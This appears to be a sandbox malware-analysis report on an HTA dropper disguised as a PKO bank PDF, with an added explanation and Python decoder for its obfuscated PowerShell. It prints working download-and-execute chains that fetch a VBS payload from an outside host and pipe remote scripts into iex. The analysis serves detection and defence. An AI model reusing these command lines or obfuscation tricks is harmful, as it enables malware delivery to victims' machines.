          Source: wscript.exe, 00000007.00000002.1899271460.0000000000658000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pko-download.kagyouth.co.ke/:
          Source: mshta.exe, 00000000.00000003.1838231650.0000000002B6E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1840152370.0000000002B6E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.1841794584.0000000002B6E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.1909848462.0000000002DED000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.1912407424.0000000002DF2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.1914670320.0000000002DF4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pko-download.kagyouth.co.ke/O
          Source: mshta.exe, 00000000.00000003.1838231650.0000000002B6E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1840152370.0000000002B6E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.1841794584.0000000002B6E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pko-download.kagyouth.co.ke/P
          Source: wscript.exe, wscript.exe, 0000000A.00000003.1911549070.0000000005043000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.1914474150.0000000002DA4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.1910556458.0000000002D9C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.1914733283.0000000002F30000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.1911863015.0000000002DA2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.1909848462.0000000002D99000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.1911774958.0000000002D9F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pko-download.kagyouth.co.ke/js/pmxdhq.txt
          Source: wscript.exe, 0000000A.00000003.1911549070.0000000005043000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pko-download.kagyouth.co.ke/js/pmxdhq.txt0#vF~
          Source: wscript.exe, 0000000A.00000002.1914474150.0000000002DA4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.1910556458.0000000002D9C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.1911863015.0000000002DA2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.1909848462.0000000002D99000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.1911774958.0000000002D9F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pko-download.kagyouth.co.ke/js/pmxdhq.txtd
          Source: wscript.exe, 00000007.00000003.1895860613.0000000004CE3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000002.1901053777.0000000000AB0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.1893884972.00000000006B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pko-download.kagyouth.co.ke/js/riodfc.txt
          Source: wscript.exe, 00000007.00000003.1894254003.00000000006BB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.1895012733.00000000006BD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000002.1899786645.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.1895382763.00000000006C1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.1893884972.00000000006B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pko-download.kagyouth.co.ke/js/riodfc.txtYqH
Source: wscript.exe, 00000007.00000003.1895437106.000000000070B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.1894254003.000000000070B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000002.1900594503.000000000070B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://pko-download.kagyouth.co.ke/jsc.js
Source: wscript.exe, 0000000A.00000003.1909848462.0000000002DED000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.1912407424.0000000002DF2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.1914670320.0000000002DF4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://pko-download.kagyouth.co.ke/jsq.js
Source: wscript.exe, 0000000A.00000002.1914733283.0000000002F30000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://pko-download.kagyouth.co.ke/list_files.p
Source: wscript.exe, 00000007.00000002.1901053777.0000000000AB0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://pko-download.kagyouth.co.ke/list_files.pM
Source: wscript.exe, wscript.exe, 0000000A.00000002.1914474150.0000000002DA4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.1909848462.0000000002DED000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.1910556458.0000000002D9C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.1912407424.0000000002DF2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.1914670320.0000000002DF4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.1914733283.0000000002F30000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.1911863015.0000000002DA2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.1909848462.0000000002D99000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.1911774958.0000000002D9F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://pko-download.kagyouth.co.ke/list_files.php
Source: wscript.exe, 0000000A.00000003.1909848462.0000000002DED000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.1912407424.0000000002DF2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.1914670320.0000000002DF4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://pko-download.kagyouth.co.ke/list_files.phpe
Source: wscript.exe, 00000007.00000003.1894254003.00000000006BB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.1895012733.00000000006BD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000002.1899786645.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.1895382763.00000000006C1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.1893884972.00000000006B7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://pko-download.kagyouth.co.ke/list_files.phpitX
Source: powershell.exe, 0000000F.00000002.1967997619.0000021C10364000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2002991318.0000015900B44000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://play.google.com/?hl=en&tab=w8
Source: powershell.exe, 00000011.00000002.2002991318.000001590052D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ssl.gstatic.com/gb/images/b_8d5afc09.png);_background:url(https://ssl.gstatic.com/gb/images/
Source: powershell.exe, 0000000F.00000002.1967997619.0000021C10364000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2002991318.0000015900B44000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://translate.google.com/?hl=en&tab=wT
Source: powershell.exe, 0000000F.00000002.1967997619.0000021C10364000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2002991318.0000015900B44000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/finance?tab=we
Source: powershell.exe, 0000000F.00000002.1967997619.0000021C10364000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2002991318.0000015900B44000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/imghp?hl=en&tab=wi
Source: powershell.exe, 0000000F.00000002.1967997619.0000021C10364000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2002991318.0000015900B44000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/intl/en/about/products?tab=whX
Source: powershell.exe, 0000000F.00000002.1967997619.0000021C0FC9A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2002991318.000001590047A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/logos/doodles/2024/seasonal-holid
Source: powershell.exe, 00000011.00000002.2002991318.000001590047A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/logos/doodles/2024/seasonal-holidays-20
Source: powershell.exe, 0000000F.00000002.1967997619.0000021C0FC9A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/logos/doodles/2024/seasonal-holidays-202
Source: powershell.exe, 00000011.00000002.2002991318.0000015900FF1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/logos/doodles/2024/seasonal-holidays-2024-6753651837110333-2xa.gif
Source: powershell.exe, 0000000F.00000002.1967997619.0000021C0FC9A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2002991318.000001590047A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/logos/doodles/2024/seasonal-holidays-2024-6753651837110333-2xa.gifX
Source: powershell.exe, 0000000F.00000002.1967997619.0000021C0FC9A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/logos/doodles/2024/seasonal-holidays-202gin
Source: powershell.exe, 00000011.00000002.2002991318.000001590047A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/logos/doodles/2024/seasonal-holidays-20Type0
Source: powershell.exe, 0000000F.00000002.1967997619.0000021C10364000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2002991318.0000015900B44000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/shopping?hl=en&source=og&tab=wf
Source: powershell.exe, 0000000F.00000002.1967997619.0000021C10364000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2002991318.0000015900B44000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/webhp?tab=ww
Source: powershell.exe, 00000011.00000002.2002991318.0000015900615000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2002991318.0000015901A8E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2046174346.00000159101D9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2002991318.000001590047A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2046174346.0000015910011000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2046174346.00000159102FF000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.gstatic.com
Source: powershell.exe, 00000011.00000002.2002991318.0000015900615000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.gstatic.comX
Source: powershell.exe, 0000000F.00000002.1967997619.0000021C10364000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2002991318.0000015900B44000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.youtube.com/?tab=w1
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown | Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown | Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown | Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown | HTTPS traffic detected: 45.11.180.77:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 45.11.180.77:443 -> 192.168.2.4:49737 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 45.11.180.77:443 -> 192.168.2.4:49739 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 45.11.180.77:443 -> 192.168.2.4:49740 version: TLS 1.2

          System Summary

Source: C:\Windows\SysWOW64\wscript.exe | COM Object queried: XML HTTP HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{F6D90F16-9C73-11D3-B32E-00C04F990BB4}
Source: C:\Windows\SysWOW64\wscript.exe | COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
Source: C:\Windows\SysWOW64\wscript.exe | COM Object queried: WBEM Locator HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}
Source: C:\Windows\SysWOW64\wscript.exe | COM Object queried: Windows Management and Instrumentation HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 17_2_00007FFD9B7E201D
Source: C:\Windows\SysWOW64\mshta.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: classification engine | Classification label: mal100.troj.expl.evad.winHTA@28/15@4/4
Source: C:\Windows\SysWOW64\mshta.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\676198543e135[1].js
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7596:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7744:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7848:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5224:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6828:120:WilError_03
Source: C:\Windows\SysWOW64\wscript.exe | File created: C:\Users\user\AppData\Local\Temp\riodfc.js
Source: C:\Windows\SysWOW64\mshta.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /V/D/c curl -k -o C:\Users\Public\676198543e2f3.vbs https://pko-download.kagyouth.co.ke/676198543e20a/676198543e2f3.vbs
Source: C:\Windows\SysWOW64\wscript.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Windows\SysWOW64\wscript.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Windows\SysWOW64\wscript.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Windows\SysWOW64\wscript.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Windows\SysWOW64\wscript.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Windows\SysWOW64\wscript.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Windows\SysWOW64\mshta.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Windows\SysWOW64\mshta.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown | Process created: C:\Windows\SysWOW64\mshta.exe mshta.exe "C:\Users\user\Desktop\PKO_0019868519477_PDF_#U2462#U2465#U2461#U2465#U2467#U2464#U2464#U2466.hta"
Source: C:\Windows\SysWOW64\mshta.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /V/D/c curl -k -o C:\Users\Public\676198543e2f3.vbs https://pko-download.kagyouth.co.ke/676198543e20a/676198543e2f3.vbs
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\curl.exe curl -k -o C:\Users\Public\676198543e2f3.vbs https://pko-download.kagyouth.co.ke/676198543e20a/676198543e2f3.vbs
Source: C:\Windows\SysWOW64\mshta.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /V/D/c start C:\Users\Public\676198543e2f3.vbs
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Public\676198543e2f3.vbs"
Source: C:\Windows\SysWOW64\mshta.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /V/D/c start C:\Users\Public\676198543e2f3.vbs
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Public\676198543e2f3.vbs"
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" //E:jscript C:\Users\user\AppData\Local\Temp\riodfc.js
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" //E:jscript C:\Users\user\AppData\Local\Temp\pmxdhq.js
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\System32\conhost.exe conhost --headless powershell $qlsaitfogcdk='ur' ;new-alias printout c$($qlsaitfogcdk)l;$bxcsrwklu=(9122,9134,9130,9134,9129,9136,9117,9075,9141,9122,9070,9065,9135,9130,9131,9066,9068,9065,9131,9123,9131,9082,9134,9080,9128,9124,9129,9135,9134,9069,9068);$qatenrdzxhfi=('bronx','get-cmdlet');$hepltzuk=$bxcsrwklu;foreach($vhrpuksybcwal in $hepltzuk){$rtqbhnzejclomf=$vhrpuksybcwal;$lsazfhgenmk=$lsazfhgenmk+[char]($rtqbhnzejclomf-9019);$zmsflnojqgtd=$lsazfhgenmk; $majklvetzswhbp=$zmsflnojqgtd};$ydrzolhea[2]=$majklvetzswhbp;$ruyhial='rl';$udsqxtw=1;.$([char](9992-9887)+'e'+'x')(printout -useb $majklvetzswhbp)
Source: C:\Windows\System32\conhost.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $qlsaitfogcdk='ur' ;new-alias printout c$($qlsaitfogcdk)l;$bxcsrwklu=(9122,9134,9130,9134,9129,9136,9117,9075,9141,9122,9070,9065,9135,9130,9131,9066,9068,9065,9131,9123,9131,9082,9134,9080,9128,9124,9129,9135,9134,9069,9068);$qatenrdzxhfi=('bronx','get-cmdlet');$hepltzuk=$bxcsrwklu;foreach($vhrpuksybcwal in $hepltzuk){$rtqbhnzejclomf=$vhrpuksybcwal;$lsazfhgenmk=$lsazfhgenmk+[char]($rtqbhnzejclomf-9019);$zmsflnojqgtd=$lsazfhgenmk; $majklvetzswhbp=$zmsflnojqgtd};$ydrzolhea[2]=$majklvetzswhbp;$ruyhial='rl';$udsqxtw=1;.$([char](9992-9887)+'e'+'x')(printout -useb $majklvetzswhbp)
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\System32\conhost.exe conhost --headless powershell $wesvdclpag='ur' ;new-alias printout c$($wesvdclpag)l;$kiubxj=(8009,8021,8017,8021,8016,8023,8004,7962,8028,8009,7957,7952,8022,8017,8018,7953,7955,7952,8018,8010,8018,7969,8021,7967,8015,8011,8016,8022,8021,7956,7955);$yhgausrze=('bronx','get-cmdlet');$ibaoenpfqcwds=$kiubxj;foreach($capbmdvq in $ibaoenpfqcwds){$islyzgjwhrxt=$capbmdvq;$alhsoibwvkj=$alhsoibwvkj+[char]($islyzgjwhrxt-7906);$lkzfxe=$alhsoibwvkj; $wrbziekv=$lkzfxe};$mxhfwdcnuibzy[2]=$wrbziekv;$owqrhjdva='rl';$jpkizcrmv=1;.$([char](9992-9887)+'e'+'x')(printout -useb $wrbziekv)
Source: C:\Windows\System32\conhost.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $wesvdclpag='ur' ;new-alias printout c$($wesvdclpag)l;$kiubxj=(8009,8021,8017,8021,8016,8023,8004,7962,8028,8009,7957,7952,8022,8017,8018,7953,7955,7952,8018,8010,8018,7969,8021,7967,8015,8011,8016,8022,8021,7956,7955);$yhgausrze=('bronx','get-cmdlet');$ibaoenpfqcwds=$kiubxj;foreach($capbmdvq in $ibaoenpfqcwds){$islyzgjwhrxt=$capbmdvq;$alhsoibwvkj=$alhsoibwvkj+[char]($islyzgjwhrxt-7906);$lkzfxe=$alhsoibwvkj; $wrbziekv=$lkzfxe};$mxhfwdcnuibzy[2]=$wrbziekv;$owqrhjdva='rl';$jpkizcrmv=1;.$([char](9992-9887)+'e'+'x')(printout -useb $wrbziekv)
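The two PowerShell command lines above share one obfuscation scheme. `$x='ur'; new-alias printout c$($x)l` registers `printout` as an alias for `curl`, and in Windows PowerShell `curl` is itself an alias of Invoke-WebRequest, so `printout -useb` is `Invoke-WebRequest -UseBasicParsing`. The integer array is the download URL with a constant added to every character code (9019 in the first line, 7906 in the second); the foreach loop subtracts it back one character at a time. `.$([char](9992-9887)+'e'+'x')` evaluates to `.iex`, so the fetched body is executed in memory and never touches disk. The `('bronx','get-cmdlet')`, `'rl'` and `=1` assignments are dead stores, and the URL never appears in plaintext anywhere in the command line, so a string search of the process tree alone would not recover it. The decoder below is an added example written for this page, not part of the Joe Sandbox report; it embeds the two command lines exactly as listed, parses them with regular expressions and reconstructs alias target, fetch flag, URL and sink without executing any PowerShell. Both lines decode to the same scheme-less target, which Invoke-WebRequest fetches over plain HTTP when no scheme is given.

```python
import re

# The two powershell.exe command lines exactly as listed in the report.
# Everything else in this block is added example code, not report content.
CMDLINE_1 = (
    "powershell $qlsaitfogcdk='ur' ;new-alias printout c$($qlsaitfogcdk)l;"
    "$bxcsrwklu=(9122,9134,9130,9134,9129,9136,9117,9075,9141,9122,9070,9065,9135,9130,"
    "9131,9066,9068,9065,9131,9123,9131,9082,9134,9080,9128,9124,9129,9135,9134,9069,9068);"
    "$qatenrdzxhfi=('bronx','get-cmdlet');$hepltzuk=$bxcsrwklu;"
    "foreach($vhrpuksybcwal in $hepltzuk){$rtqbhnzejclomf=$vhrpuksybcwal;"
    "$lsazfhgenmk=$lsazfhgenmk+[char]($rtqbhnzejclomf-9019);$zmsflnojqgtd=$lsazfhgenmk; "
    "$majklvetzswhbp=$zmsflnojqgtd};$ydrzolhea[2]=$majklvetzswhbp;$ruyhial='rl';$udsqxtw=1;"
    ".$([char](9992-9887)+'e'+'x')(printout -useb $majklvetzswhbp)"
)
CMDLINE_2 = (
    "powershell $wesvdclpag='ur' ;new-alias printout c$($wesvdclpag)l;"
    "$kiubxj=(8009,8021,8017,8021,8016,8023,8004,7962,8028,8009,7957,7952,8022,8017,"
    "8018,7953,7955,7952,8018,8010,8018,7969,8021,7967,8015,8011,8016,8022,8021,7956,7955);"
    "$yhgausrze=('bronx','get-cmdlet');$ibaoenpfqcwds=$kiubxj;"
    "foreach($capbmdvq in $ibaoenpfqcwds){$islyzgjwhrxt=$capbmdvq;"
    "$alhsoibwvkj=$alhsoibwvkj+[char]($islyzgjwhrxt-7906);$lkzfxe=$alhsoibwvkj; "
    "$wrbziekv=$lkzfxe};$mxhfwdcnuibzy[2]=$wrbziekv;$owqrhjdva='rl';$jpkizcrmv=1;"
    ".$([char](9992-9887)+'e'+'x')(printout -useb $wrbziekv)"
)


def resolve_alias(cmdline):
    """Resolve `new-alias NAME c$($var)l` where $var was set to a string literal just before it."""
    m = re.search(r"\$(\w+)='([^']*)'\s*;new-alias\s+(\w+)\s+([^;\s]+)", cmdline)
    var, value, alias, template = m.groups()
    return alias, template.replace(f"$(${var})", value)


def decode_char_array(cmdline):
    """Rebuild the string the foreach loop builds: every array element minus the constant."""
    nums = re.search(r"\((\d+(?:,\d+){2,})\)", cmdline).group(1)          # first int list
    offset = int(re.search(r"\[char\]\(\$\w+-(\d+)\)", cmdline).group(1))  # [char]($v-NNNN)
    return "".join(chr(int(n) - offset) for n in nums.split(","))


def decode_sink(cmdline):
    """Evaluate .$([char](A-B)+'e'+'x'): the cmdlet the downloaded body is handed to."""
    m = re.search(r"\.\$\(\[char\]\((\d+)-(\d+)\)((?:\+'[^']*')*)\)", cmdline)
    first = chr(int(m.group(1)) - int(m.group(2)))
    return first + "".join(re.findall(r"'([^']*)'", m.group(3)))


def deobfuscate(cmdline):
    """Summarise one command line as the plain cmdlet invocation it is equivalent to."""
    alias, target = resolve_alias(cmdline)
    url = decode_char_array(cmdline)
    sink = decode_sink(cmdline)
    # `-useb` is the unambiguous prefix of Invoke-WebRequest's -UseBasicParsing switch
    fetch_flag = re.search(rf"{alias}\s+(-\S+)\s+\$\w+", cmdline).group(1)
    return {
        "alias": alias,
        "alias_target": target,
        "fetch_flag": fetch_flag,
        "url": url,
        "sink": sink,
        "equivalent": f"{sink} (Invoke-WebRequest -UseBasicParsing {url})",
    }


if __name__ == "__main__":
    for line in (CMDLINE_1, CMDLINE_2):
        print(deobfuscate(line))
```

The two regexes are deliberately narrow: they match the `$var='literal' ;new-alias` and `[char]($v-N)` shapes seen here and will need adjusting for variants that hide the offset in a second variable or build the array from a split string.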
Source: C:\Windows\SysWOW64\mshta.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /V/D/c curl -k -o C:\Users\Public\676198543e2f3.vbs https://pko-download.kagyouth.co.ke/676198543e20a/676198543e2f3.vbs
Source: C:\Windows\SysWOW64\mshta.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /V/D/c start C:\Users\Public\676198543e2f3.vbs
Source: C:\Windows\SysWOW64\mshta.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /V/D/c start C:\Users\Public\676198543e2f3.vbs
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\curl.exe curl -k -o C:\Users\Public\676198543e2f3.vbs https://pko-download.kagyouth.co.ke/676198543e20a/676198543e2f3.vbs
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Public\676198543e2f3.vbs"
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" //E:jscript C:\Users\user\AppData\Local\Temp\riodfc.js
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Public\676198543e2f3.vbs"
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" //E:jscript C:\Users\user\AppData\Local\Temp\pmxdhq.js
Source: C:\Windows\System32\conhost.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $qlsaitfogcdk='ur' ;new-alias printout c$($qlsaitfogcdk)l;$bxcsrwklu=(9122,9134,9130,9134,9129,9136,9117,9075,9141,9122,9070,9065,9135,9130,9131,9066,9068,9065,9131,9123,9131,9082,9134,9080,9128,9124,9129,9135,9134,9069,9068);$qatenrdzxhfi=('bronx','get-cmdlet');$hepltzuk=$bxcsrwklu;foreach($vhrpuksybcwal in $hepltzuk){$rtqbhnzejclomf=$vhrpuksybcwal;$lsazfhgenmk=$lsazfhgenmk+[char]($rtqbhnzejclomf-9019);$zmsflnojqgtd=$lsazfhgenmk; $majklvetzswhbp=$zmsflnojqgtd};$ydrzolhea[2]=$majklvetzswhbp;$ruyhial='rl';$udsqxtw=1;.$([char](9992-9887)+'e'+'x')(printout -useb $majklvetzswhbp)
